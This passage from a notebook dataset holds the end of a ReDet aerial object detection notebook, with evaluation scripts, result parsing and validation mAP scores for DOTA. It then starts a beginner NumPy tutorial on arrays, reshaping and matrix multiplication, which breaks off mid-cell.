overlaps\n # intersection\n\n # 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.\n # pdb.set_trace()\n BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)\n BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)\n BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)\n BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)\n bb_xmin = np.min(bb[0::2])\n bb_ymin = np.min(bb[1::2])\n bb_xmax = np.max(bb[0::2])\n bb_ymax = np.max(bb[1::2])\n\n ixmin = np.maximum(BBGT_xmin, bb_xmin)\n iymin = np.maximum(BBGT_ymin, bb_ymin)\n ixmax = np.minimum(BBGT_xmax, bb_xmax)\n iymax = np.minimum(BBGT_ymax, bb_ymax)\n iw = np.maximum(ixmax - ixmin + 1., 0.)\n ih = np.maximum(iymax - iymin + 1., 0.)\n inters = iw * ih\n\n # union\n uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +\n (BBGT_xmax - BBGT_xmin + 1.) *\n (BBGT_ymax - BBGT_ymin + 1.) 
- inters)\n\n overlaps = inters / uni\n\n BBGT_keep_mask = overlaps > 0\n BBGT_keep = BBGT[BBGT_keep_mask, :]\n BBGT_keep_index = np.where(overlaps > 0)[0]\n # pdb.set_trace()\n def calcoverlaps(BBGT_keep, bb):\n overlaps = []\n for index, GT in enumerate(BBGT_keep):\n\n overlap = polyiou.iou_poly(polyiou.VectorDouble(BBGT_keep[index]), polyiou.VectorDouble(bb))\n overlaps.append(overlap)\n return overlaps\n if len(BBGT_keep) > 0:\n overlaps = calcoverlaps(BBGT_keep, bb)\n\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n # pdb.set_trace()\n jmax = BBGT_keep_index[jmax]\n\n if ovmax > ovthresh:\n if not R['difficult'][jmax]:\n if not R['det'][jmax]:\n tp[d] = 1.\n R['det'][jmax] = 1\n else:\n fp[d] = 1.\n else:\n fp[d] = 1.\n\n # compute precision recall\n\n print('check fp:', fp)\n print('check tp', tp)\n\n\n print('npos num:', npos)\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n ap = voc_ap(rec, prec, use_07_metric)\n\n return rec, prec, ap\n\ndef main():\n \n detpath = r'/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/Task1_{:s}.txt'\n annopath = r'/content/ReDet/data/HRSC2016/Test/labelTxt/{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset\n imagesetfile = r'/content/ReDet/data/HRSC2016/Test/test.txt'\n\n\n # For HRSC2016\n classnames = ['ship']\n classaps = []\n map = 0\n for classname in classnames:\n print('classname:', classname)\n rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n ovthresh=0.5,\n use_07_metric=True)\n map = map + ap\n #print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)\n print('ap: ', ap)\n classaps.append(ap)\n\n # umcomment to show p-r curve of each category\n # plt.figure(figsize=(8,4))\n # plt.xlabel('recall')\n # plt.ylabel('precision')\n # plt.plot(rec, prec)\n # plt.show()\n map = map/len(classnames)\n print('map:', map)\n classaps = 100*np.array(classaps)\n print('classaps: ', classaps)\nif __name__ == '__main__':\n main()",
"_____no_output_____"
],
[
"# evaluation\n# remeber to modify the results path in hrsc2016_evaluation.py\n!python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py",
"_____no_output_____"
]
],
[
[
"# برای پارس کردن فایل **ولیدیشن** کد زیر اجرا شود",
"_____no_output_____"
]
],
[
[
"# %pycat /content/AerialDetection/tools/parse_results.py\n%%writefile /content/ReDet/tools/parse_results.py\n\nfrom __future__ import division\n\nimport argparse\nimport os.path as osp\nimport shutil\nimport tempfile\n\nimport mmcv\nfrom mmdet.apis import init_dist\nfrom mmdet.core import results2json, coco_eval, \\\n HBBSeg2Comp4, OBBDet2Comp4, OBBDetComp4, \\\n HBBOBB2Comp4, HBBDet2Comp4\n\nimport argparse\n\nfrom mmdet import __version__\nfrom mmdet.datasets import get_dataset\nfrom mmdet.apis import (train_detector, init_dist, get_root_logger,\n set_random_seed)\nfrom mmdet.models import build_detector\nimport torch\nimport json\nfrom mmcv import Config\nimport sys\n# sys.path.insert(0, '../')\n# import DOTA_devkit.ResultMerge_multi_process as RM\nfrom DOTA_devkit.ResultMerge_multi_process import *\n# import pdb; pdb.set_trace()\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a detector')\n parser.add_argument('--config', default='configs/DOTA/faster_rcnn_r101_fpn_1x_dota2_v3_RoITrans_v5.py')\n parser.add_argument('--type', default=r'HBB',\n help='parse type of detector')\n args = parser.parse_args()\n\n return args\n\ndef OBB2HBB(srcpath, dstpath):\n filenames = util.GetFileFromThisRootDir(srcpath)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n for file in filenames:\n with open(file, 'r') as f_in:\n with open(os.path.join(dstpath, os.path.basename(os.path.splitext(file)[0]) + '.txt'), 'w') as f_out:\n lines = f_in.readlines()\n splitlines = [x.strip().split() for x in lines]\n for index, splitline in enumerate(splitlines):\n imgname = splitline[0]\n score = splitline[1]\n poly = splitline[2:]\n poly = list(map(float, poly))\n xmin, xmax, ymin, ymax = min(poly[0::2]), max(poly[0::2]), min(poly[1::2]), max(poly[1::2])\n rec_poly = [xmin, ymin, xmax, ymax]\n outline = imgname + ' ' + score + ' ' + ' '.join(map(str, rec_poly))\n if index != (len(splitlines) - 1):\n outline = outline + '\\n'\n f_out.write(outline)\n\ndef parse_results(config_file, resultfile, dstpath, type):\n cfg = Config.fromfile(config_file)\n\n data_test = cfg.data['test']\n dataset = get_dataset(data_test)\n outputs = mmcv.load(resultfile)\n if type == 'OBB':\n # dota1 has tested\n \n obb_results_dict = OBBDetComp4(dataset, outputs)\n current_thresh = 0.1\n elif type == 'HBB':\n # dota1 has tested\n hbb_results_dict = HBBDet2Comp4(dataset, outputs)\n elif type == 'HBBOBB':\n # dota1 has tested\n # dota2\n hbb_results_dict, obb_results_dict = HBBOBB2Comp4(dataset, outputs)\n current_thresh = 0.3\n elif type == 'Mask':\n # TODO: dota1 did not pass\n # dota2, hbb has passed, obb has passed\n hbb_results_dict, obb_results_dict = HBBSeg2Comp4(dataset, outputs)\n current_thresh = 0.3\n\n dataset_type = cfg.dataset_type\n\n if 'obb_results_dict' in vars():\n if not os.path.exists(os.path.join(dstpath, 'Task1_results')):\n os.makedirs(os.path.join(dstpath, 'Task1_results'))\n\n for cls in obb_results_dict:\n with open(os.path.join(dstpath, 'Task1_results', cls + '.txt'), 'w') as obb_f_out:\n for index, outline in enumerate(obb_results_dict[cls]):\n if index != (len(obb_results_dict[cls]) - 1):\n obb_f_out.write(outline + '\\n')\n else:\n obb_f_out.write(outline)\n\n if not os.path.exists(os.path.join(dstpath, 'Task1_results_nms')):\n os.makedirs(os.path.join(dstpath, 'Task1_results_nms'))\n\n mergebypoly_multiprocess(os.path.join(dstpath, 'Task1_results'),\n os.path.join(dstpath, 'Task1_results_nms'), nms_type=r'py_cpu_nms_poly_fast', o_thresh=current_thresh)\n\n 
OBB2HBB(os.path.join(dstpath, 'Task1_results_nms'),\n os.path.join(dstpath, 'Transed_Task2_results_nms'))\n\n if 'hbb_results_dict' in vars():\n if not os.path.exists(os.path.join(dstpath, 'Task2_results')):\n os.makedirs(os.path.join(dstpath, 'Task2_results'))\n for cls in hbb_results_dict:\n with open(os.path.join(dstpath, 'Task2_results', cls + '.txt'), 'w') as f_out:\n for index, outline in enumerate(hbb_results_dict[cls]):\n if index != (len(hbb_results_dict[cls]) - 1):\n f_out.write(outline + '\\n')\n else:\n f_out.write(outline)\n\n if not os.path.exists(os.path.join(dstpath, 'Task2_results_nms')):\n os.makedirs(os.path.join(dstpath, 'Task2_results_nms'))\n mergebyrec(os.path.join(dstpath, 'Task2_results'),\n os.path.join(dstpath, 'Task2_results_nms'))\n\nif __name__ == '__main__':\n args = parse_args()\n config_file = args.config\n config_name = os.path.splitext(os.path.basename(config_file))[0]\n\n ######################################################################################/content/AerialDetection/work_dirs\n # pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'results.pkl')\n pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'valresults.pkl')\n output_path = os.path.join('/content/ReDet/work_dirs', config_name)\n type = args.type\n parse_results(config_file, pkl_file, output_path, type)",
"_____no_output_____"
]
],
[
[
"# به کمک دستورات زیر از فایل تولید شدهی سریالایز شده سه فلدر پارس شده دریافت میشود",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/parse_results.py --config /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py --type OBB",
"_____no_output_____"
]
],
[
[
"باید دانلود شده زیپ شده و آپلود شود Task1_results_nms برای ارزیابی تسک اول فایل ",
"_____no_output_____"
]
],
[
[
"#!tar -cvf '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms.tar' '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms'",
"_____no_output_____"
]
],
[
[
"# ارزیابی val",
"_____no_output_____"
]
],
[
[
"import glob\nimport os\n\nos.chdir(r'/content/ReDet/data/dota/val/images')\n# myFiles = glob.glob('*.bmp')\n%ls -1 | sed 's/\\.png//g' > ./testset.txt\n# print(myFiles)\n!mv '/content/ReDet/data/dota/val/images/testset.txt' '/content/ReDet/data/dota/val'",
"_____no_output_____"
],
[
"%%writefile /content/ReDet/DOTA_devkit/dota_evaluation_task1.py\n\nimport os\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nsys.path.insert(1,os.path.dirname(__file__))\nimport polyiou\nimport argparse\n\n\ndef parse_gt(filename):\n \"\"\"\n :param filename: ground truth file to parse\n :return: all instances in a picture\n \"\"\"\n objects = []\n with open(filename, 'r') as f:\n while True:\n line = f.readline()\n if line:\n splitlines = line.strip().split(' ')\n object_struct = {}\n if (len(splitlines) < 9):\n continue\n object_struct['name'] = splitlines[8]\n\n if (len(splitlines) == 9):\n object_struct['difficult'] = 0\n elif (len(splitlines) == 10):\n object_struct['difficult'] = int(splitlines[9])\n object_struct['bbox'] = [float(splitlines[0]),\n float(splitlines[1]),\n float(splitlines[2]),\n float(splitlines[3]),\n float(splitlines[4]),\n float(splitlines[5]),\n float(splitlines[6]),\n float(splitlines[7])]\n objects.append(object_struct)\n else:\n break\n return objects\n\n\ndef voc_ap(rec, prec, use_07_metric=False):\n \"\"\" ap = voc_ap(rec, prec, [use_07_metric])\n Compute VOC AP given precision and recall.\n If use_07_metric is true, uses the\n VOC 07 11 point method (default:False).\n \"\"\"\n if use_07_metric:\n # 11 point metric\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n # cachedir,\n ovthresh=0.5,\n use_07_metric=False):\n \"\"\"rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n [ovthresh],\n [use_07_metric])\n Top level function that does the PASCAL VOC evaluation.\n detpath: Path to detections\n detpath.format(classname) should produce the detection results file.\n annopath: Path to annotations\n annopath.format(imagename) should be the xml annotations file.\n imagesetfile: Text file containing the list of images, one image per line.\n classname: Category name (duh)\n cachedir: Directory for caching the annotations\n [ovthresh]: Overlap threshold (default = 0.5)\n [use_07_metric]: Whether to use VOC07's 11 point AP computation\n (default False)\n \"\"\"\n # assumes detections are in detpath.format(classname)\n # assumes annotations are in annopath.format(imagename)\n # assumes imagesetfile is a text file with each line an image name\n # cachedir caches the annotations in a pickle file\n\n # read list of images\n with open(imagesetfile, 'r') as f:\n lines = f.readlines()\n imagenames = [x.strip() for x in lines]\n\n recs = {}\n for i, imagename in enumerate(imagenames):\n ##############################################################################################################\n # print('parse_files name: ', annopath.format(imagename))\n recs[imagename] = parse_gt(annopath.format(imagename))\n\n # extract gt objects for this class\n class_recs = {}\n npos = 0\n for imagename in imagenames:\n R = [obj 
for obj in recs[imagename] if obj['name'] == classname]\n bbox = np.array([x['bbox'] for x in R])\n difficult = np.array([x['difficult'] for x in R]).astype(np.bool)\n det = [False] * len(R)\n npos = npos + sum(~difficult)\n class_recs[imagename] = {'bbox': bbox,\n 'difficult': difficult,\n 'det': det}\n\n # read dets from Task1* files\n detfile = detpath.format(classname)\n with open(detfile, 'r') as f:\n lines = f.readlines()\n\n splitlines = [x.strip().split(' ') for x in lines]\n image_ids = [x[0] for x in splitlines]\n confidence = np.array([float(x[1]) for x in splitlines])\n\n BB = np.array([[float(z) for z in x[2:]] for x in splitlines])\n\n # sort by confidence\n sorted_ind = np.argsort(-confidence)\n sorted_scores = np.sort(-confidence)\n\n # note the usage only in numpy not for list\n BB = BB[sorted_ind, :]\n image_ids = [image_ids[x] for x in sorted_ind]\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n R = class_recs[image_ids[d]]\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R['bbox'].astype(float)\n\n # compute det bb with each BBGT\n if BBGT.size > 0:\n # compute overlaps\n # intersection\n\n # 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.\n BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)\n BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)\n BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)\n BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)\n bb_xmin = np.min(bb[0::2])\n bb_ymin = np.min(bb[1::2])\n bb_xmax = np.max(bb[0::2])\n bb_ymax = np.max(bb[1::2])\n\n ixmin = np.maximum(BBGT_xmin, bb_xmin)\n iymin = np.maximum(BBGT_ymin, bb_ymin)\n ixmax = np.minimum(BBGT_xmax, bb_xmax)\n iymax = np.minimum(BBGT_ymax, bb_ymax)\n iw = np.maximum(ixmax - ixmin + 1., 0.)\n ih = np.maximum(iymax - iymin + 1., 0.)\n inters = iw * ih\n\n # union\n uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +\n (BBGT_xmax - BBGT_xmin + 1.) *\n (BBGT_ymax - BBGT_ymin + 1.) 
- inters)\n\n overlaps = inters / uni\n\n BBGT_keep_mask = overlaps > 0\n BBGT_keep = BBGT[BBGT_keep_mask, :]\n BBGT_keep_index = np.where(overlaps > 0)[0]\n\n def calcoverlaps(BBGT_keep, bb):\n overlaps = []\n for index, GT in enumerate(BBGT_keep):\n\n overlap = polyiou.iou_poly(polyiou.VectorDouble(\n BBGT_keep[index]), polyiou.VectorDouble(bb))\n overlaps.append(overlap)\n return overlaps\n if len(BBGT_keep) > 0:\n overlaps = calcoverlaps(BBGT_keep, bb)\n\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n # pdb.set_trace()\n jmax = BBGT_keep_index[jmax]\n\n if ovmax > ovthresh:\n if not R['difficult'][jmax]:\n if not R['det'][jmax]:\n tp[d] = 1.\n R['det'][jmax] = 1\n else:\n fp[d] = 1.\n else:\n fp[d] = 1.\n\n # compute precision recall\n\n print('check fp:', fp)\n print('check tp', tp)\n\n print('npos num:', npos)\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n ap = voc_ap(rec, prec, use_07_metric)\n\n return rec, prec, ap\n\n\ndef dota_task1_eval(work_dir, det_dir):\n detpath = os.path.join(det_dir, r'Task1_{:s}.txt')\n annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'\n imagesetfile = r'data/dota/test/testset.txt'\n # For DOTA-v1.0\n classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',\n 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']\n classaps = []\n map = 0\n for classname in classnames:\n print('classname:', classname)\n rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n ovthresh=0.5,\n use_07_metric=True)\n map = map + ap\n #print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)\n print('ap: ', ap)\n classaps.append(ap)\n map = map/len(classnames)\n print('map:', map)\n classaps = 100*np.array(classaps)\n print('classaps: ', classaps)\n # writing results to txt file\n with open(os.path.join(work_dir, 'Task1_results.txt'), 'w') as f:\n out_str = ''\n out_str += 'mAP:'+str(map)+'\\n'\n out_str += 'APs:\\n'\n out_str += ' '.join([str(ap)for ap in classaps.tolist()])\n f.write(out_str)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--work_dir',default='')\n return parser.parse_args()\n\ndef main():\n args = parse_args()\n # detpath = os.path.join(args.work_dir,'Task1_results_nms/Task1_{:s}.txt')\n detpath = os.path.join(args.work_dir,'Task1_results_nms/{:s}.txt')\n ###################################################################################################################\n # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset\n # annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'\n # imagesetfile = r'data/dota/test/testset.txt'\n annopath = r'/content/ReDet/data/dota/val/labelTxt/{:s}.txt'\n imagesetfile = r'/content/ReDet/data/dota/val/testset.txt'\n\n # For DOTA-v1.5\n # classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',\n # 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter', 'container-crane']\n # For DOTA-v1.0\n classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',\n 'basketball-court', 'storage-tank', 'soccer-ball-field', 
'roundabout', 'harbor', 'swimming-pool', 'helicopter']\n classaps = []\n map = 0\n for classname in classnames:\n print('classname:', classname)\n rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n ovthresh=0.5,\n use_07_metric=True)\n map = map + ap\n #print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)\n print('ap: ', ap)\n classaps.append(ap)\n\n # # umcomment to show p-r curve of each category\n # plt.figure(figsize=(8,4))\n # plt.xlabel('Recall')\n # plt.ylabel('Precision')\n # plt.xticks(fontsize=11)\n # plt.yticks(fontsize=11)\n # plt.xlim(0, 1)\n # plt.ylim(0, 1)\n # ax = plt.gca()\n # ax.spines['top'].set_color('none')\n # ax.spines['right'].set_color('none')\n # plt.plot(rec, prec)\n # # plt.show()\n # plt.savefig('pr_curve/{}.png'.format(classname))\n map = map/len(classnames)\n print('map:', map)\n classaps = 100*np.array(classaps)\n print('classaps: ', classaps)\n\n\nif __name__ == '__main__':\n main()\n",
"_____no_output_____"
],
[
"!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1",
"_____no_output_____"
],
[
"!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota",
"_____no_output_____"
],
[
"!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota",
"_____no_output_____"
]
],
[
[
"# لیست خروجی ولیدیشنها",
"_____no_output_____"
],
[
"**ReDet**\n\nmap: 0.8514600172670281\n\nclassaps: [90.74063962 88.35952404 70.27778167 83.69586216 71.37892832 88.03846396\n 88.83972303 90.90909091 89.87234694 90.00746689 90.00924415 82.27596327\n 88.32895278 80.09628041 84.35975774]",
"_____no_output_____"
],
[
"**faster_rcnn_RoITrans_r50_fpn_1x_dota**\n\nmap: 0.8416679746473459\n\nclassaps: [90.14526646 87.5615606 73.58691439 80.72462287 74.76489526 88.86002316\n 88.68232501 90.59249634 87.15753582 90.14873059 75.92481942 85.70194711\n 87.96535504 81.13566148 79.54980843]",
"_____no_output_____"
],
[
"**faster_rcnn_obb_r50_fpn_1x_dota**\n\nmap: 0.7869873566873331\n\nclassaps: [90.22626651 83.21467398 60.88286463 66.33192138 70.29939163 84.09063058\n 88.17042018 90.89576113 80.49975872 89.18961722 78.22831552 79.33052598\n 75.461711 71.27527659 72.38389998]",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2b5dfc17a44d6dab64a704e24b316a298ee79f | 107,856 | ipynb | Jupyter Notebook | Tutorial_24_Integration.ipynb | Japhiolite/JuliaTutorial | 3222ce1b55361c43a25ea76bb01990d0723a9adf | [
"MIT"
] | 86 | 2017-05-03T06:12:57.000Z | 2022-03-25T19:55:15.000Z | Tutorial_24_Integration.ipynb | Japhiolite/JuliaTutorial | 3222ce1b55361c43a25ea76bb01990d0723a9adf | [
"MIT"
] | 2 | 2018-03-01T12:26:58.000Z | 2021-08-09T18:20:07.000Z | Tutorial_24_Integration.ipynb | Japhiolite/JuliaTutorial | 3222ce1b55361c43a25ea76bb01990d0723a9adf | [
"MIT"
] | 54 | 2017-05-03T06:12:58.000Z | 2021-10-15T07:49:55.000Z | 153.641026 | 17,104 | 0.674761 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb2b5f77dfd26e2561ce17ae48bcaa38992b183e | 22,370 | ipynb | Jupyter Notebook | part-1/Intro_to_NumPy.ipynb | masterflorin/dlnd-udacity | 53dc427a7337c4c232668225d35043e370a0d96a | [
"MIT"
] | 1 | 2020-01-19T17:26:36.000Z | 2020-01-19T17:26:36.000Z | part-1/Intro_to_NumPy.ipynb | masterflorin/dlnd-udacity | 53dc427a7337c4c232668225d35043e370a0d96a | [
"MIT"
] | null | null | null | part-1/Intro_to_NumPy.ipynb | masterflorin/dlnd-udacity | 53dc427a7337c4c232668225d35043e370a0d96a | [
"MIT"
] | 1 | 2020-01-19T17:27:09.000Z | 2020-01-19T17:27:09.000Z | 23.97642 | 549 | 0.495217 | [
[
[
"## Importing the library",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
]
],
[
[
"## Data Types",
"_____no_output_____"
],
[
"### Scalars",
"_____no_output_____"
]
],
[
[
"# creating a scalar, we use the 'array' in order to create any type of data type e.g. scalar, vector, matrix\ns = np.array(5)\n# visualizing the shape of a scalar, in the example below it returns an empty tuple which is normal\n# a scalar has zero-length which in numpy is represented as an empty tuple\nprint(s.shape) \n# we can do operations on a scalar e.g addition\nx = s + 3\nprint(x)",
"()\n8\n"
]
],
[
[
"### Vectors",
"_____no_output_____"
]
],
[
[
"# creating a vector. we have to pass a list as input\nv = np.array([1,2,3])\n# visualizing the shape, a 3-long row vector. This can also be stored as a column vector\nprint(v.shape)\n# access first element\nv[1]\n# access from second to last\nv[1:]",
"(3,)\n"
]
],
[
[
"### Matrices",
"_____no_output_____"
]
],
[
[
"# creating a matrix, with a list of lists as input\nm = np.array([[1,2,3], [4,5,6], [7,8,9]])\n# visualize shape, a 3 x 3 matrix\nm.shape\n# access from the second row, first two elements\nm[1,:2]\n# access elements from all rows from the third column\nm[:,-1]",
"_____no_output_____"
]
],
[
[
"### Tensors",
"_____no_output_____"
]
],
[
[
"# creating a 4-dimensional tensor\nt = np.array([[[[1],[2]],[[3],[4]],[[5],[6]]],[[[7],[8]],\\\n [[9],[10]],[[11],[12]]],[[[13],[14]],[[15],[16]],[[17],[17]]]])\n# visualize shape, this structure is going to be used a lot of times in PyTorch and other deep learning frameworks\nt.shape\n# access number 16, we have to pass through the dimensions by using multiple indices\n# in order to get to the value\nt[2][1][1][0]",
"_____no_output_____"
]
],
[
[
"### Changing shapes\nSometimes you'll need to change the shape of your data without actually changing its contents. For example, you may have a vector, which is one-dimensional, but need a matrix, which is two-dimensional.",
"_____no_output_____"
]
],
[
[
"# let's say we have a row vector\nv = np.array([1,2,3,4])\nv.shape",
"_____no_output_____"
],
[
"# what if we wanted a 1x4 matrix instead but without re-declaring the variable\nx = v.reshape(1,4) # specify the column size, then the row size\nprint(x)\nx.shape",
"[[1 2 3 4]]\n"
],
[
"# and we could change back to 4x1\nx = x.reshape(4,1)\nprint(x)\nx.shape",
"[[1]\n [2]\n [3]\n [4]]\n"
]
],
[
[
"#### Other way of changing shape\nFrom Udacity: Those lines create a slice that looks at all of the items of `v` but asks NumPy to add a new dimension of size 1 for the associated axis. It may look strange to you now, but it's a common technique so it's good to be aware of it. ",
"_____no_output_____"
]
],
[
[
"# other ways to reshape using slicing which is a very common practice when working with numpy arrays\n# this is essentially telling us slice the array, give me all the columns and put them under one column\nx = v[None, :]\nprint(x)\nx.shape",
"[[1 2 3 4]]\n"
],
[
"# give me all the rows and put them in one column\nx = v[:, None]\nprint(x)\nx.shape",
"[[1]\n [2]\n [3]\n [4]]\n"
]
],
[
[
"### Element-wise operations",
"_____no_output_____"
]
],
[
[
"# performing a scalar addition\nvalues = [1,2,3,4,5]\nvalues = np.array(values) + 5\nprint(values)",
"[ 6 7 8 9 10]\n"
],
[
"# scalar multiplication, you can either use operators or functions\nsome_values = [2,3,4,5]\nx = np.multiply(some_values, 5)\nprint(x)\ny = np.array(some_values) * 5\nprint(y)",
"[10 15 20 25]\n[10 15 20 25]\n"
],
[
"# set every element to 0 in a matrix\nm = np.array([1,27,98, 5])\nprint(m)\n# now every element in m is zero, no matter how many dimensions it has\nm *= 0\nprint(m)",
"[ 1 27 98 5]\n[0 0 0 0]\n"
]
],
[
[
"### Element-wise Matrix Operations\nThe **key** here is to remember that these operations work only with matrices of the same shape, \nif the shapes are different then we couldn't perform the addition as below",
"_____no_output_____"
]
],
[
[
"a = np.array([[1,3],[5,7]])\nb = np.array([[2,4],[6,8]])\na + b",
"_____no_output_____"
]
],
[
[
"### Matrix multiplication",
"_____no_output_____"
],
[
"### Important Reminders About Matrix Multiplication\n\n- The number of columns in the left matrix must equal the number of rows in the right matrix.\n- The answer matrix always has the same number of rows as the left matrix and the same number of columns as the right matrix.\n- Order matters. Multiplying A•B is not the same as multiplying B•A.\n- Data in the left matrix should be arranged as rows., while data in the right matrix should be arranged as columns.",
"_____no_output_____"
]
],
[
[
"m = np.array([[1,2,3],[4,5,6]])\nn = m * 0.25\n\nnp.multiply(m,n) # m * n",
"_____no_output_____"
]
],
[
[
"#### Matrix Product",
"_____no_output_____"
]
],
[
[
"# pay close attention to the shapes of the matrices\n# the column of the left matrix must have the same value as the row of the right matrix\na = np.array([[1,2,3,4],[5,6,7,8]])\nprint(a.shape)\nb = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])\nprint(b.shape)\nc = np.matmul(a,b)\nprint(c)",
"(2, 4)\n(4, 3)\n[[ 70 80 90]\n [158 184 210]]\n"
]
],
[
[
"#### Dot Product\nIt turns out that the results of `dot` and `matmul` are the same if the matrices are two dimensional. However, if the dimensions differ then you should expect different results so it's best to check the documentation for [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) and [matmul](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html#numpy.matmul).",
"_____no_output_____"
]
],
[
[
"a = np.array([[1,2],[3,4]])\n# two ways of calling dot product\nnp.dot(a,a)\na.dot(a)\nnp.matmul(a,a)",
